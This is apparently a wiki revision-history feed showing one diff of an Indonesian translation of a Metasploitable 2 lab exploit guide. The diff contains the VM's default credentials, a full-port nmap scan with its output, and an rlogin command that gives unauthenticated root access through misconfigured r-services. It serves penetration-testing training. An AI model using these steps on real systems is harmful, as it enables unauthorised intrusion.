<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Metasploitable%3A_Exploit_Guide</id>
	<title>Metasploitable: Exploit Guide - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Metasploitable%3A_Exploit_Guide"/>
	<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;action=history"/>
	<updated>2026-04-09T15:53:37Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.4</generator>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62081&amp;oldid=prev</id>
		<title>Onnowpurbo at 01:43, 21 July 2020</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62081&amp;oldid=prev"/>
		<updated>2020-07-21T01:43:14Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 01:43, 21 July 2020&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l7&quot; &gt;Line 7:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 7:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Getting Started==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Getting Started==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;After the virtual machine boots, login to console with &lt;/del&gt;username msfadmin &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;and &lt;/del&gt;password msfadmin. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;From the shell, run the &lt;/del&gt;ifconfig &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;command to identify the IP address.&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Login dengan &lt;/ins&gt;username msfadmin password msfadmin. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Jalankan&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; &lt;/ins&gt;ifconfig&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt; msfadmin@metasploitable:~$ ifconfig&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1  &lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1  &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;            inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;            inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l17&quot; &gt;Line 17:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 18:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Services==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Services==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;From our attack system (&lt;/del&gt;Linux, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;preferably something like Kali Linux)&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Dari Kali &lt;/ins&gt;Linux, &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;cek port yang terbuka&lt;/ins&gt;,&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;root@ubuntu:~# &lt;/del&gt;nmap -p0-65535 192.168.99.131&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  nmap -p0-65535 192.168.99.131&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l58&quot; &gt;Line 58:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 59:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  MAC Address: 00:0C:29:9A:52:C1 (VMware)&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  MAC Address: 00:0C:29:9A:52:C1 (VMware)&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Nearly every one of these listening services provides a remote entry point into the system. In the next section, we will walk through some of these vectors&lt;/del&gt;.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Masing-masing port dapat merupakan pintu masuk&lt;/ins&gt;.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Unix Basics==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Unix Basics==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;TCP &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;ports &lt;/del&gt;512, 513, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;and &lt;/del&gt;514 &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;are known as &lt;/del&gt;&amp;quot;r&amp;quot; services, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;and have been &lt;/del&gt;misconfigured &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;to allow remote access from any &lt;/del&gt;host &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;(a standard &amp;quot;&lt;/del&gt;.&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;rhosts + +&amp;quot; situation). To take advantage of this&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;make sure the &amp;quot;rsh&lt;/del&gt;-&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;client&amp;quot; client is installed (on Ubuntu), and run the following command as your local &lt;/del&gt;root &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;user&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH&lt;/del&gt;.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;TCP &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;port &lt;/ins&gt;512, 513, &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;amp; &lt;/ins&gt;514 &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;di kenal dengan &lt;/ins&gt;&amp;quot;r&amp;quot; services, &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;pada metasploitable service ini di &lt;/ins&gt;misconfigured &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;sehingga dapat di akses dari &lt;/ins&gt;host &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;mana pun&lt;/ins&gt;. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Dari ubuntu&lt;/ins&gt;,&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; rlogin &lt;/ins&gt;-&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;l &lt;/ins&gt;root &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;192.168&lt;/ins&gt;.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;99&lt;/ins&gt;.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;131&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt; # rlogin -l root 192.168.99.131&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Last login: Fri Jun  1 00:10:39 EDT 2012 from :0.0 on pts/0&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Last login: Fri Jun  1 00:10:39 EDT 2012 from :0.0 on pts/0&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt; root@metasploitable:~#&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt; root@metasploitable:~#&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Network File System (NFS) port 2049 dapat di cek menggunakan&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
